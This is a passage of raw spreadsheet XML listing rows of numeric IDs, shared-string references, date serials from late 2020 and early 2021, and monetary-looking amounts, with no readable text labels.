    <row r="2909" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2909">
        <v>22799</v>
      </c>
      <c r="B2909">
        <v>2857</v>
      </c>
      <c r="C2909" t="s">
        <v>7809</v>
      </c>
      <c r="D2909" t="s">
        <v>12252</v>
      </c>
      <c r="E2909">
        <v>16</v>
      </c>
      <c r="F2909" t="s">
        <v>2236</v>
      </c>
      <c r="G2909" s="1">
        <v>44140</v>
      </c>
      <c r="H2909">
        <v>0</v>
      </c>
    </row>
    <row r="2910" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2910">
        <v>22801</v>
      </c>
      <c r="B2910">
        <v>2857</v>
      </c>
      <c r="C2910" t="s">
        <v>7809</v>
      </c>
      <c r="D2910" t="s">
        <v>12252</v>
      </c>
      <c r="E2910">
        <v>16</v>
      </c>
      <c r="F2910" t="s">
        <v>12254</v>
      </c>
      <c r="G2910" s="1">
        <v>44140</v>
      </c>
      <c r="H2910">
        <v>0</v>
      </c>
    </row>
    <row r="2911" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2911">
        <v>22802</v>
      </c>
      <c r="B2911">
        <v>2857</v>
      </c>
      <c r="C2911" t="s">
        <v>7809</v>
      </c>
      <c r="D2911" t="s">
        <v>12252</v>
      </c>
      <c r="E2911">
        <v>16</v>
      </c>
      <c r="F2911" t="s">
        <v>12169</v>
      </c>
      <c r="G2911" s="1">
        <v>44140</v>
      </c>
      <c r="H2911">
        <v>98412</v>
      </c>
    </row>
    <row r="2912" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2912">
        <v>22803</v>
      </c>
      <c r="B2912">
        <v>236</v>
      </c>
      <c r="C2912" t="s">
        <v>1890</v>
      </c>
      <c r="D2912" t="s">
        <v>11158</v>
      </c>
      <c r="E2912">
        <v>16</v>
      </c>
      <c r="F2912" t="s">
        <v>12255</v>
      </c>
      <c r="G2912" s="1">
        <v>44175</v>
      </c>
      <c r="H2912">
        <v>18000</v>
      </c>
      <c r="J2912" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="2913" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2913">
        <v>22804</v>
      </c>
      <c r="B2913">
        <v>2857</v>
      </c>
      <c r="C2913" t="s">
        <v>7809</v>
      </c>
      <c r="D2913" t="s">
        <v>12252</v>
      </c>
      <c r="E2913">
        <v>16</v>
      </c>
      <c r="F2913" t="s">
        <v>12256</v>
      </c>
      <c r="G2913" s="1">
        <v>44140</v>
      </c>
      <c r="H2913">
        <v>3055424</v>
      </c>
      <c r="J2913" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2914" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2914">
        <v>22805</v>
      </c>
      <c r="B2914">
        <v>2857</v>
      </c>
      <c r="C2914" t="s">
        <v>7809</v>
      </c>
      <c r="D2914" t="s">
        <v>12252</v>
      </c>
      <c r="E2914">
        <v>16</v>
      </c>
      <c r="F2914" t="s">
        <v>12257</v>
      </c>
      <c r="G2914" s="1">
        <v>44140</v>
      </c>
      <c r="H2914">
        <v>0</v>
      </c>
      <c r="J2914" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2915" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2915">
        <v>22808</v>
      </c>
      <c r="B2915">
        <v>1999</v>
      </c>
      <c r="C2915" t="s">
        <v>5213</v>
      </c>
      <c r="D2915" t="s">
        <v>12258</v>
      </c>
      <c r="E2915">
        <v>10</v>
      </c>
      <c r="F2915" t="s">
        <v>673</v>
      </c>
      <c r="G2915" s="1">
        <v>44140</v>
      </c>
      <c r="H2915">
        <v>4500000</v>
      </c>
      <c r="J2915" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2916" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2916">
        <v>22809</v>
      </c>
      <c r="B2916">
        <v>1999</v>
      </c>
      <c r="C2916" t="s">
        <v>5213</v>
      </c>
      <c r="D2916" t="s">
        <v>12258</v>
      </c>
      <c r="E2916">
        <v>10</v>
      </c>
      <c r="F2916" t="s">
        <v>9441</v>
      </c>
      <c r="G2916" s="1">
        <v>44140</v>
      </c>
      <c r="H2916">
        <v>4500000</v>
      </c>
      <c r="I2916" t="s">
        <v>9870</v>
      </c>
      <c r="J2916" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2917" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2917">
        <v>22810</v>
      </c>
      <c r="B2917">
        <v>1999</v>
      </c>
      <c r="C2917" t="s">
        <v>5213</v>
      </c>
      <c r="D2917" t="s">
        <v>12258</v>
      </c>
      <c r="E2917">
        <v>10</v>
      </c>
      <c r="F2917" t="s">
        <v>12259</v>
      </c>
      <c r="G2917" s="1">
        <v>44140</v>
      </c>
      <c r="H2917">
        <v>378000</v>
      </c>
      <c r="J2917" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="2918" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2918">
        <v>22811</v>
      </c>
      <c r="B2918">
        <v>1999</v>
      </c>
      <c r="C2918" t="s">
        <v>5213</v>
      </c>
      <c r="D2918" t="s">
        <v>12258</v>
      </c>
      <c r="E2918">
        <v>10</v>
      </c>
      <c r="F2918" t="s">
        <v>12260</v>
      </c>
      <c r="G2918" s="1">
        <v>44140</v>
      </c>
      <c r="H2918">
        <v>280000</v>
      </c>
      <c r="J2918" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2919" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2919">
        <v>22812</v>
      </c>
      <c r="B2919">
        <v>1223</v>
      </c>
      <c r="C2919" t="s">
        <v>3739</v>
      </c>
      <c r="D2919" t="s">
        <v>12261</v>
      </c>
      <c r="E2919">
        <v>26</v>
      </c>
      <c r="F2919" t="s">
        <v>9437</v>
      </c>
      <c r="G2919" s="1">
        <v>44258</v>
      </c>
      <c r="H2919">
        <v>60000</v>
      </c>
      <c r="I2919" t="s">
        <v>9536</v>
      </c>
      <c r="J2919" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="2920" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2920">
        <v>22813</v>
      </c>
      <c r="B2920">
        <v>1223</v>
      </c>
      <c r="C2920" t="s">
        <v>3739</v>
      </c>
      <c r="D2920" t="s">
        <v>12261</v>
      </c>
      <c r="E2920">
        <v>26</v>
      </c>
      <c r="F2920" t="s">
        <v>12263</v>
      </c>
      <c r="G2920" s="1">
        <v>44258</v>
      </c>
      <c r="H2920">
        <v>60000</v>
      </c>
      <c r="I2920" t="s">
        <v>9536</v>
      </c>
      <c r="J2920" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="2921" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2921">
        <v>22814</v>
      </c>
      <c r="B2921">
        <v>1223</v>
      </c>
      <c r="C2921" t="s">
        <v>3739</v>
      </c>
      <c r="D2921" t="s">
        <v>12261</v>
      </c>
      <c r="E2921">
        <v>26</v>
      </c>
      <c r="F2921" t="s">
        <v>12264</v>
      </c>
      <c r="G2921" s="1">
        <v>44258</v>
      </c>
      <c r="H2921">
        <v>5000</v>
      </c>
      <c r="I2921" t="s">
        <v>9536</v>
      </c>
      <c r="J2921" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="2922" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2922">
        <v>22815</v>
      </c>
      <c r="B2922">
        <v>1223</v>
      </c>
      <c r="C2922" t="s">
        <v>3739</v>
      </c>
      <c r="D2922" t="s">
        <v>12261</v>
      </c>
      <c r="E2922">
        <v>26</v>
      </c>
      <c r="F2922" t="s">
        <v>12265</v>
      </c>
      <c r="G2922" s="1">
        <v>44258</v>
      </c>
      <c r="H2922">
        <v>1000</v>
      </c>
      <c r="I2922" t="s">
        <v>9536</v>
      </c>
      <c r="J2922" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="2923" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2923">
        <v>22816</v>
      </c>
      <c r="B2923">
        <v>1223</v>
      </c>
      <c r="C2923" t="s">
        <v>3739</v>
      </c>
      <c r="D2923" t="s">
        <v>12261</v>
      </c>
      <c r="E2923">
        <v>26</v>
      </c>
      <c r="F2923" t="s">
        <v>12266</v>
      </c>
      <c r="G2923" s="1">
        <v>44258</v>
      </c>
      <c r="H2923">
        <v>1000</v>
      </c>
      <c r="I2923" t="s">
        <v>9536</v>
      </c>
      <c r="J2923" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="2924" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2924">
        <v>22817</v>
      </c>
      <c r="B2924">
        <v>862</v>
      </c>
      <c r="C2924" t="s">
        <v>3051</v>
      </c>
      <c r="D2924" t="s">
        <v>10942</v>
      </c>
      <c r="E2924">
        <v>2</v>
      </c>
      <c r="F2924" t="s">
        <v>9441</v>
      </c>
      <c r="G2924" s="1">
        <v>44159</v>
      </c>
      <c r="H2924">
        <v>300000</v>
      </c>
      <c r="J2924" t="s">
        <v>12267</v>
      </c>
    </row>
    <row r="2925" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2925">
        <v>22818</v>
      </c>
      <c r="B2925">
        <v>5049</v>
      </c>
      <c r="C2925" t="s">
        <v>7822</v>
      </c>
      <c r="D2925" t="s">
        <v>12268</v>
      </c>
      <c r="E2925">
        <v>26</v>
      </c>
      <c r="F2925" t="s">
        <v>364</v>
      </c>
      <c r="G2925" s="1">
        <v>44120</v>
      </c>
      <c r="H2925">
        <v>300000</v>
      </c>
      <c r="I2925" t="s">
        <v>12269</v>
      </c>
      <c r="J2925" t="s">
        <v>12270</v>
      </c>
    </row>
    <row r="2926" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2926">
        <v>22824</v>
      </c>
      <c r="B2926">
        <v>5020</v>
      </c>
      <c r="C2926" t="s">
        <v>7830</v>
      </c>
      <c r="D2926" t="s">
        <v>12271</v>
      </c>
      <c r="E2926">
        <v>34</v>
      </c>
      <c r="F2926" t="s">
        <v>12272</v>
      </c>
      <c r="G2926" s="1">
        <v>44172</v>
      </c>
      <c r="H2926">
        <v>600000</v>
      </c>
      <c r="I2926" t="s">
        <v>9693</v>
      </c>
      <c r="J2926" t="s">
        <v>12273</v>
      </c>
    </row>
    <row r="2927" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2927">
        <v>22826</v>
      </c>
      <c r="B2927">
        <v>1248</v>
      </c>
      <c r="C2927" t="s">
        <v>2951</v>
      </c>
      <c r="D2927" t="s">
        <v>10666</v>
      </c>
      <c r="E2927">
        <v>11</v>
      </c>
      <c r="F2927" t="s">
        <v>9466</v>
      </c>
      <c r="G2927" s="1">
        <v>44298</v>
      </c>
      <c r="H2927">
        <v>3000</v>
      </c>
      <c r="J2927" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2928" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2928">
        <v>22827</v>
      </c>
      <c r="B2928">
        <v>1248</v>
      </c>
      <c r="C2928" t="s">
        <v>2951</v>
      </c>
      <c r="D2928" t="s">
        <v>10666</v>
      </c>
      <c r="E2928">
        <v>11</v>
      </c>
      <c r="F2928" t="s">
        <v>9217</v>
      </c>
      <c r="G2928" s="1">
        <v>44298</v>
      </c>
      <c r="H2928">
        <v>5000</v>
      </c>
      <c r="J2928" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2929" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2929">
        <v>22828</v>
      </c>
      <c r="B2929">
        <v>1248</v>
      </c>
      <c r="C2929" t="s">
        <v>2951</v>
      </c>
      <c r="D2929" t="s">
        <v>10666</v>
      </c>
      <c r="E2929">
        <v>11</v>
      </c>
      <c r="F2929" t="s">
        <v>9483</v>
      </c>
      <c r="G2929" s="1">
        <v>44298</v>
      </c>
      <c r="H2929">
        <v>3000</v>
      </c>
      <c r="J2929" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2930" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2930">
        <v>22829</v>
      </c>
      <c r="B2930">
        <v>1248</v>
      </c>
      <c r="C2930" t="s">
        <v>2951</v>
      </c>
      <c r="D2930" t="s">
        <v>10666</v>
      </c>
      <c r="E2930">
        <v>11</v>
      </c>
      <c r="F2930" t="s">
        <v>5434</v>
      </c>
      <c r="G2930" s="1">
        <v>44298</v>
      </c>
      <c r="H2930">
        <v>10000</v>
      </c>
      <c r="J2930" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2931" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2931">
        <v>22830</v>
      </c>
      <c r="B2931">
        <v>1248</v>
      </c>
      <c r="C2931" t="s">
        <v>2951</v>
      </c>
      <c r="D2931" t="s">
        <v>10666</v>
      </c>
      <c r="E2931">
        <v>11</v>
      </c>
      <c r="F2931" t="s">
        <v>9454</v>
      </c>
      <c r="G2931" s="1">
        <v>44298</v>
      </c>
      <c r="H2931">
        <v>3000</v>
      </c>
      <c r="J2931" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2932" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2932">
        <v>22831</v>
      </c>
      <c r="B2932">
        <v>1248</v>
      </c>
      <c r="C2932" t="s">
        <v>2951</v>
      </c>
      <c r="D2932" t="s">
        <v>10666</v>
      </c>
      <c r="E2932">
        <v>11</v>
      </c>
      <c r="F2932" t="s">
        <v>10387</v>
      </c>
      <c r="G2932" s="1">
        <v>44298</v>
      </c>
      <c r="H2932">
        <v>1000</v>
      </c>
      <c r="J2932" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2933" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2933">
        <v>22832</v>
      </c>
      <c r="B2933">
        <v>1248</v>
      </c>
      <c r="C2933" t="s">
        <v>2951</v>
      </c>
      <c r="D2933" t="s">
        <v>10666</v>
      </c>
      <c r="E2933">
        <v>11</v>
      </c>
      <c r="F2933" t="s">
        <v>12274</v>
      </c>
      <c r="G2933" s="1">
        <v>44298</v>
      </c>
      <c r="H2933">
        <v>2000</v>
      </c>
      <c r="J2933" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2934" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2934">
        <v>22833</v>
      </c>
      <c r="B2934">
        <v>1248</v>
      </c>
      <c r="C2934" t="s">
        <v>2951</v>
      </c>
      <c r="D2934" t="s">
        <v>10666</v>
      </c>
      <c r="E2934">
        <v>11</v>
      </c>
      <c r="F2934" t="s">
        <v>9556</v>
      </c>
      <c r="G2934" s="1">
        <v>44298</v>
      </c>
      <c r="H2934">
        <v>1000</v>
      </c>
      <c r="J2934" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2935" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2935">
        <v>22834</v>
      </c>
      <c r="B2935">
        <v>1248</v>
      </c>
      <c r="C2935" t="s">
        <v>2951</v>
      </c>
      <c r="D2935" t="s">
        <v>10666</v>
      </c>
      <c r="E2935">
        <v>11</v>
      </c>
      <c r="F2935" t="s">
        <v>9642</v>
      </c>
      <c r="G2935" s="1">
        <v>44298</v>
      </c>
      <c r="H2935">
        <v>2000</v>
      </c>
      <c r="J2935" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2936" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2936">
        <v>22835</v>
      </c>
      <c r="B2936">
        <v>1248</v>
      </c>
      <c r="C2936" t="s">
        <v>2951</v>
      </c>
      <c r="D2936" t="s">
        <v>10666</v>
      </c>
      <c r="E2936">
        <v>11</v>
      </c>
      <c r="F2936" t="s">
        <v>12275</v>
      </c>
      <c r="G2936" s="1">
        <v>44298</v>
      </c>
      <c r="H2936">
        <v>15000000</v>
      </c>
      <c r="J2936" t="s">
        <v>12276</v>
      </c>
    </row>
    <row r="2937" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2937">
        <v>22836</v>
      </c>
      <c r="B2937">
        <v>1248</v>
      </c>
      <c r="C2937" t="s">
        <v>2951</v>
      </c>
      <c r="D2937" t="s">
        <v>10666</v>
      </c>
      <c r="E2937">
        <v>11</v>
      </c>
      <c r="F2937" t="s">
        <v>3814</v>
      </c>
      <c r="G2937" s="1">
        <v>44298</v>
      </c>
      <c r="H2937">
        <v>2000</v>
      </c>
      <c r="J2937" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2938" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2938">
        <v>22837</v>
      </c>
      <c r="B2938">
        <v>1248</v>
      </c>
      <c r="C2938" t="s">
        <v>2951</v>
      </c>
      <c r="D2938" t="s">
        <v>10666</v>
      </c>
      <c r="E2938">
        <v>11</v>
      </c>
      <c r="F2938" t="s">
        <v>12277</v>
      </c>
      <c r="G2938" s="1">
        <v>44298</v>
      </c>
      <c r="H2938">
        <v>15000</v>
      </c>
      <c r="J2938" t="s">
        <v>12278</v>
      </c>
    </row>
    <row r="2939" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2939">
        <v>22838</v>
      </c>
      <c r="B2939">
        <v>1248</v>
      </c>
      <c r="C2939" t="s">
        <v>2951</v>
      </c>
      <c r="D2939" t="s">
        <v>10666</v>
      </c>
      <c r="E2939">
        <v>11</v>
      </c>
      <c r="F2939" t="s">
        <v>11215</v>
      </c>
      <c r="G2939" s="1">
        <v>44298</v>
      </c>
      <c r="H2939">
        <v>2000</v>
      </c>
      <c r="J2939" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2940" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2940">
        <v>22839</v>
      </c>
      <c r="B2940">
        <v>1248</v>
      </c>
      <c r="C2940" t="s">
        <v>2951</v>
      </c>
      <c r="D2940" t="s">
        <v>10666</v>
      </c>
      <c r="E2940">
        <v>11</v>
      </c>
      <c r="F2940" t="s">
        <v>9838</v>
      </c>
      <c r="G2940" s="1">
        <v>44298</v>
      </c>
      <c r="H2940">
        <v>1000</v>
      </c>
      <c r="J2940" t="s">
        <v>12279</v>
      </c>
    </row>
    <row r="2941" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2941">
        <v>22840</v>
      </c>
      <c r="B2941">
        <v>1248</v>
      </c>
      <c r="C2941" t="s">
        <v>2951</v>
      </c>
      <c r="D2941" t="s">
        <v>10666</v>
      </c>
      <c r="E2941">
        <v>11</v>
      </c>
      <c r="F2941" t="s">
        <v>11419</v>
      </c>
      <c r="G2941" s="1">
        <v>44298</v>
      </c>
      <c r="H2941">
        <v>1000</v>
      </c>
      <c r="J2941" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="2942" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2942">
        <v>22841</v>
      </c>
      <c r="B2942">
        <v>1248</v>
      </c>
      <c r="C2942" t="s">
        <v>2951</v>
      </c>
      <c r="D2942" t="s">
        <v>10666</v>
      </c>
      <c r="E2942">
        <v>11</v>
      </c>
      <c r="F2942" t="s">
        <v>9532</v>
      </c>
      <c r="G2942" s="1">
        <v>44298</v>
      </c>
      <c r="H2942">
        <v>5000</v>
      </c>
      <c r="J2942" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="2943" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2943">
        <v>22842</v>
      </c>
      <c r="B2943">
        <v>1248</v>
      </c>
      <c r="C2943" t="s">
        <v>2951</v>
      </c>
      <c r="D2943" t="s">
        <v>10666</v>
      </c>
      <c r="E2943">
        <v>11</v>
      </c>
      <c r="F2943" t="s">
        <v>11554</v>
      </c>
      <c r="G2943" s="1">
        <v>44298</v>
      </c>
      <c r="H2943">
        <v>1000</v>
      </c>
      <c r="J2943" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2944" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2944">
        <v>22844</v>
      </c>
      <c r="B2944">
        <v>590</v>
      </c>
      <c r="C2944" t="s">
        <v>317</v>
      </c>
      <c r="D2944" t="s">
        <v>12280</v>
      </c>
      <c r="E2944">
        <v>26</v>
      </c>
      <c r="F2944" t="s">
        <v>609</v>
      </c>
      <c r="G2944" s="1">
        <v>44146</v>
      </c>
      <c r="H2944">
        <v>500000</v>
      </c>
      <c r="I2944" t="s">
        <v>9550</v>
      </c>
      <c r="J2944" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2945" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2945">
        <v>22845</v>
      </c>
      <c r="B2945">
        <v>590</v>
      </c>
      <c r="C2945" t="s">
        <v>317</v>
      </c>
      <c r="D2945" t="s">
        <v>12280</v>
      </c>
      <c r="E2945">
        <v>26</v>
      </c>
      <c r="F2945" t="s">
        <v>2236</v>
      </c>
      <c r="G2945" s="1">
        <v>44146</v>
      </c>
      <c r="H2945">
        <v>50000</v>
      </c>
      <c r="I2945" t="s">
        <v>9536</v>
      </c>
      <c r="J2945" t="s">
        <v>9960</v>
      </c>
    </row>
    <row r="2946" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2946">
        <v>22846</v>
      </c>
      <c r="B2946">
        <v>590</v>
      </c>
      <c r="C2946" t="s">
        <v>317</v>
      </c>
      <c r="D2946" t="s">
        <v>12280</v>
      </c>
      <c r="E2946">
        <v>26</v>
      </c>
      <c r="F2946" t="s">
        <v>4686</v>
      </c>
      <c r="G2946" s="1">
        <v>44146</v>
      </c>
      <c r="H2946">
        <v>25000</v>
      </c>
      <c r="J2946" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2947" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2947">
        <v>22847</v>
      </c>
      <c r="B2947">
        <v>2772</v>
      </c>
      <c r="C2947" t="s">
        <v>4132</v>
      </c>
      <c r="D2947" t="s">
        <v>10886</v>
      </c>
      <c r="E2947">
        <v>16</v>
      </c>
      <c r="F2947" t="s">
        <v>12281</v>
      </c>
      <c r="G2947" s="1">
        <v>44211</v>
      </c>
      <c r="H2947">
        <v>700000</v>
      </c>
      <c r="I2947" t="s">
        <v>9693</v>
      </c>
      <c r="J2947" t="s">
        <v>12282</v>
      </c>
    </row>
    <row r="2948" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2948">
        <v>22848</v>
      </c>
      <c r="B2948">
        <v>739</v>
      </c>
      <c r="C2948" t="s">
        <v>2002</v>
      </c>
      <c r="D2948" t="s">
        <v>12283</v>
      </c>
      <c r="E2948">
        <v>24</v>
      </c>
      <c r="F2948" t="s">
        <v>673</v>
      </c>
      <c r="G2948" s="1">
        <v>44152</v>
      </c>
      <c r="H2948">
        <v>768</v>
      </c>
      <c r="I2948" t="s">
        <v>12269</v>
      </c>
      <c r="J2948" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2949" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2949">
        <v>22850</v>
      </c>
      <c r="B2949">
        <v>658</v>
      </c>
      <c r="C2949" t="s">
        <v>1846</v>
      </c>
      <c r="D2949" t="s">
        <v>12284</v>
      </c>
      <c r="E2949">
        <v>24</v>
      </c>
      <c r="F2949" t="s">
        <v>1746</v>
      </c>
      <c r="G2949" s="1">
        <v>44153</v>
      </c>
      <c r="H2949">
        <v>480000</v>
      </c>
      <c r="I2949" t="s">
        <v>12285</v>
      </c>
      <c r="J2949" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2950" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2950">
        <v>22852</v>
      </c>
      <c r="B2950">
        <v>276</v>
      </c>
      <c r="C2950" t="s">
        <v>1752</v>
      </c>
      <c r="D2950" t="s">
        <v>11776</v>
      </c>
      <c r="E2950">
        <v>16</v>
      </c>
      <c r="F2950" t="s">
        <v>12286</v>
      </c>
      <c r="G2950" s="1">
        <v>44118</v>
      </c>
      <c r="H2950">
        <v>120000</v>
      </c>
      <c r="I2950" t="s">
        <v>10323</v>
      </c>
      <c r="J2950" t="s">
        <v>12287</v>
      </c>
    </row>
    <row r="2951" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2951">
        <v>22853</v>
      </c>
      <c r="B2951">
        <v>57</v>
      </c>
      <c r="C2951" t="s">
        <v>16466</v>
      </c>
      <c r="D2951" t="s">
        <v>16467</v>
      </c>
      <c r="E2951">
        <v>12</v>
      </c>
      <c r="F2951" t="s">
        <v>2924</v>
      </c>
      <c r="G2951" s="1">
        <v>44153</v>
      </c>
      <c r="H2951">
        <v>50980.99</v>
      </c>
      <c r="I2951" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2952" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2952">
        <v>22854</v>
      </c>
      <c r="B2952">
        <v>57</v>
      </c>
      <c r="C2952" t="s">
        <v>16466</v>
      </c>
      <c r="D2952" t="s">
        <v>16467</v>
      </c>
      <c r="E2952">
        <v>12</v>
      </c>
      <c r="F2952" t="s">
        <v>9438</v>
      </c>
      <c r="G2952" s="1">
        <v>44153</v>
      </c>
      <c r="H2952">
        <v>19711.8</v>
      </c>
      <c r="I2952" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2953" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2953">
        <v>22855</v>
      </c>
      <c r="B2953">
        <v>57</v>
      </c>
      <c r="C2953" t="s">
        <v>16466</v>
      </c>
      <c r="D2953" t="s">
        <v>16468</v>
      </c>
      <c r="E2953">
        <v>12</v>
      </c>
      <c r="F2953" t="s">
        <v>12289</v>
      </c>
      <c r="G2953" s="1">
        <v>44153</v>
      </c>
      <c r="H2953" s="3" t="s">
        <v>16259</v>
      </c>
      <c r="I2953" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2954" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2954">
        <v>22857</v>
      </c>
      <c r="B2954">
        <v>57</v>
      </c>
      <c r="C2954" t="s">
        <v>16466</v>
      </c>
      <c r="D2954" t="s">
        <v>16467</v>
      </c>
      <c r="E2954">
        <v>12</v>
      </c>
      <c r="F2954" t="s">
        <v>4686</v>
      </c>
      <c r="G2954" s="1">
        <v>44153</v>
      </c>
      <c r="H2954" s="3" t="s">
        <v>16260</v>
      </c>
      <c r="I2954" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2955" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2955">
        <v>22858</v>
      </c>
      <c r="B2955">
        <v>57</v>
      </c>
      <c r="C2955" t="s">
        <v>16466</v>
      </c>
      <c r="D2955" t="s">
        <v>16468</v>
      </c>
      <c r="E2955">
        <v>12</v>
      </c>
      <c r="F2955" t="s">
        <v>12290</v>
      </c>
      <c r="G2955" s="1">
        <v>44153</v>
      </c>
      <c r="H2955" s="3" t="s">
        <v>16261</v>
      </c>
      <c r="I2955" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2956" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2956">
        <v>22862</v>
      </c>
      <c r="B2956">
        <v>606</v>
      </c>
      <c r="C2956" t="s">
        <v>1693</v>
      </c>
      <c r="D2956" t="s">
        <v>12291</v>
      </c>
      <c r="E2956">
        <v>11</v>
      </c>
      <c r="F2956" t="s">
        <v>8913</v>
      </c>
      <c r="G2956" s="1">
        <v>44145</v>
      </c>
      <c r="H2956">
        <v>0</v>
      </c>
      <c r="I2956" t="s">
        <v>9550</v>
      </c>
      <c r="J2956" t="s">
        <v>11935</v>
      </c>
    </row>
    <row r="2957" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2957">
        <v>22863</v>
      </c>
      <c r="B2957">
        <v>469</v>
      </c>
      <c r="C2957" t="s">
        <v>1626</v>
      </c>
      <c r="D2957" t="s">
        <v>11336</v>
      </c>
      <c r="E2957">
        <v>12</v>
      </c>
      <c r="F2957" t="s">
        <v>9459</v>
      </c>
      <c r="G2957" s="1">
        <v>44162</v>
      </c>
      <c r="H2957">
        <v>10000</v>
      </c>
      <c r="J2957" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2958" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2958">
        <v>22864</v>
      </c>
      <c r="B2958">
        <v>415</v>
      </c>
      <c r="C2958" t="s">
        <v>2041</v>
      </c>
      <c r="D2958" t="s">
        <v>12292</v>
      </c>
      <c r="E2958">
        <v>11</v>
      </c>
      <c r="F2958" t="s">
        <v>9437</v>
      </c>
      <c r="G2958" s="1">
        <v>44148</v>
      </c>
      <c r="H2958">
        <v>100000</v>
      </c>
      <c r="J2958" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="2959" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2959">
        <v>22865</v>
      </c>
      <c r="B2959">
        <v>415</v>
      </c>
      <c r="C2959" t="s">
        <v>2041</v>
      </c>
      <c r="D2959" t="s">
        <v>12292</v>
      </c>
      <c r="E2959">
        <v>11</v>
      </c>
      <c r="F2959" t="s">
        <v>12293</v>
      </c>
      <c r="G2959" s="1">
        <v>44148</v>
      </c>
      <c r="H2959">
        <v>100000</v>
      </c>
    </row>
    <row r="2960" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2960">
        <v>22866</v>
      </c>
      <c r="B2960">
        <v>415</v>
      </c>
      <c r="C2960" t="s">
        <v>2041</v>
      </c>
      <c r="D2960" t="s">
        <v>12292</v>
      </c>
      <c r="E2960">
        <v>11</v>
      </c>
      <c r="F2960" t="s">
        <v>12294</v>
      </c>
      <c r="G2960" s="1">
        <v>44148</v>
      </c>
      <c r="H2960">
        <v>100000</v>
      </c>
      <c r="J2960" t="s">
        <v>10616</v>
      </c>
    </row>
    <row r="2961" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2961">
        <v>22867</v>
      </c>
      <c r="B2961">
        <v>415</v>
      </c>
      <c r="C2961" t="s">
        <v>2041</v>
      </c>
